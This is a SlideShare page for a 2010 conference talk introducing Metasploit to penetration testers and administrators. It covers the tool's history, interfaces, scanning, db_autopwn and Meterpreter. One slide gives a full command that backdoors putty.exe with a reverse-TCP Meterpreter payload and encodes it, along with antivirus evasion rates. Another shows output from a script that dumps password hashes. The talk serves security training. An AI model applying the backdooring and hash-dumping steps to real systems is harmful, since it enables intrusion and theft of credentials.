Free, Powerful, Flexible
Warning




Make sure you have written permission to use apps
  like Metasploit on systems that are not yours!
Metasploit is...
History
• Started June 2003 against anti-disclosure
• 1.0 written in Perl and had 11 exploits
• 3.0 complete rewrite in Ru...
Getting Metasploit
•   Windows, Linux and UNIX packages
    •   http://www.metasploit.com/framework/download/



•   Check...
Interfaces available

• msfcli - Metasploit one-liners from the shell
• msfconsole - Text based interactive console
• msfg...
External Applications
• nmap
• Maltego
• Nessus
• Nexpose
• Ratproxy
• Karma
Capabilities
• Reconnaissance
• Scanning
• Exploit
• Control and Pivot
• Encode payloads
• Develop Exploits
Recon
•   Recon modules found in modules/auxiliary/gather/

•   DNS Enumeration

•   Email Address Collection

•   Usernam...
Scanning
Database setup
nmap scanning
Loading into utos-msf
Exploitation
• Network services - SMTP, FTP, SNMP,
  HTTP
• Client applications - Browsers, PDFs, EXE
• Wireless - MITM
• ...
db_autopwn
• Load up a vulnerability scan
Score!
Control and Pivot

• Meterpreter - Windows
• Meterpretux - Linux/POSIX
• Machterpreter - OS X
• Meterpreter in PHP
More Meterpreter
• Act as a router for the Metasploit
• Execute scripted actions
• Download password hashes
• Migrate betw...
Meterpreter Commands
commands continued...
networking
system
userland
privileged commands
Meterpreter Scripts
meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 19...
Backdooring Files
• PDF, EXE, Audio, Flash and more
•   ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106
 ...
Developing a Module
• Got something you want to exploit?
For example...
Resources

• IRC: freenode.net, #metasploit
• metasploit.com
•   http://www.offensive-security.com/metasploit-unleashed/

...
Questions?

• jwnetworkconsulting.com
• Email: tadaka__AT__gmail.com
• IRC: tadaka
• Twitter: Jason_Wood
Metasploit @ 2010 Utah Open Source Conference
Upcoming SlideShare
Loading in …5
×

Metasploit @ 2010 Utah Open Source Conference

2,840 views

Published on

Metasploit is a powerful application to use in a penetration test. It is an application that all security professionals and systems administrators should be familiar with. This presentation goes over the basics of Metasploit and some of its many capabilities.

0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,840
On SlideShare
0
From Embeds
0
Number of Embeds
10
Actions
Shares
0
Downloads
224
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide















  • -t = show all matching exploits
    -x = select modules based on vulnerability
    -p = select modules based on ports
    -e = launch exploits against all matched targets
    -r = use a reverse connect shell















  • Metasploit @ 2010 Utah Open Source Conference

    1. 1. Free, Powerful, Flexible
    2. 2. Warning Make sure you have written permission to use apps like Metasploit on systems that are not yours!
    3. 3. Metasploit is...
    4. 4. History • Started June 2003 against anti-disclosure • 1.0 written in Perl and had 11 exploits • 3.0 complete rewrite in Ruby • 3.1 Released under the BSD license • Acquired by Rapid7 on Oct 21, 2009 • 3.4.2 (svn) has 590 exploits, 305 auxiliary modules, 225 payloads and 27 encoders
    5. 5. Getting Metasploit • Windows, Linux and UNIX packages • http://www.metasploit.com/framework/download/ • Check out directly from Subversion repository • svn co https://www.metasploit.com/svn/framework3/trunk/ • Ruby 1.9.2 - current supported version
    6. 6. Interfaces available • msfcli - Metasploit one-liners from the shell • msfconsole - Text based interactive console • msfgui - Java GUI • msfweb - web interface (not currently supported) • msfrpcd - XMLRPC server
    7. 7. External Applications • nmap • Maltego • Nessus • Nexpose • Ratproxy • Karma
    8. 8. Capabilities • Reconnaissance • Scanning • Exploit • Control and Pivot • Encode payloads • Develop Exploits
    9. 9. Recon • Recon modules found in modules/auxiliary/gather/ • DNS Enumeration • Email Address Collection • Username Generation • http://sourceforge.net/projects/reconnoiter/files/ • Shodan • http://www.sploitlab.com/files/shodan_enumerator.rb
    10. 10. Scanning
    11. 11. Database setup
    12. 12. nmap scanning
    13. 13. Loading into utos-msf
    14. 14. Exploitation • Network services - SMTP, FTP, SNMP, HTTP • Client applications - Browsers, PDFs, EXE • Wireless - MITM • Web applications • Database systems
    15. 15. db_autopwn • Load up a vulnerability scan
    16. 16. Score!
    17. 17. Control and Pivot • Meterpreter - Windows • Meterpretux - Linux/POSIX • Machterpreter - OS X • Meterpreter in PHP
    18. 18. More Meterpreter • Act as a router for the Metasploit • Execute scripted actions • Download password hashes • Migrate between processes • Key logging, screen capture, edit registry • 54 different scripts in scripts/meterpreter
    19. 19. Meterpreter Commands
    20. 20. commands continued...
    21. 21. networking
    22. 22. system
    23. 23. userland
    24. 24. privileged commands
    25. 25. Meterpreter Scripts meterpreter > run winenum [*] Running Windows Local Enumerion Meterpreter Script [*] New session on 192.168.1.6:1042... [*] Saving general report to /Users/jwood/.msf3/logs/scripts/winenum/XP-UTOS-MSF_20101007.2111/XP-UTOS- MSF_20101007.2111.txt [*] Output of each individual command is saved to /Users/jwood/.msf3/logs/scripts/winenum/XP-UTOS-MSF_20101007.2111 [*] Checking if XP-UTOS-MSF is a Virtual Machine ........ [*] This is a VMWare virtual Machine [*] UAC is Disabled [*] Running Command List ... [*] running command cmd.exe /c set [*] running command arp -a [*] running command ipconfig /all [*] running command ipconfig /displaydns [*] running command route print [*] running command net view [*] running command netstat -vb [*] running command netstat -ns [*] running command net accounts .....snip.... [*] Extracting software list from registry [*] Dumping password hashes... [*] Hashes Dumped [*] Getting Tokens... [*] All tokens have been processed [*] Done!
    26. 26. Backdooring Files • PDF, EXE, Audio, Flash and more • ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/ putty_backdoored.exe -e x86/shikata_ga_nai -c 5 • Tested files on VirusTotal.com • PDF - 20 of 42 AV apps detected • EXE - 2 of 42 AV apps detected
    27. 27. Developing a Module • Got something you want to exploit?
    28. 28. For example...
    29. 29. Resources • IRC: freenode.net, #metasploit • metasploit.com • http://www.offensive-security.com/metasploit-unleashed/ • Securitytube.net • Slides at http://jwnetworkconsulting.com/downloads/utos-msf-2010.pdf
    30. 30. Questions? • jwnetworkconsulting.com • Email: tadaka__AT__gmail.com • IRC: tadaka • Twitter: Jason_Wood

    ×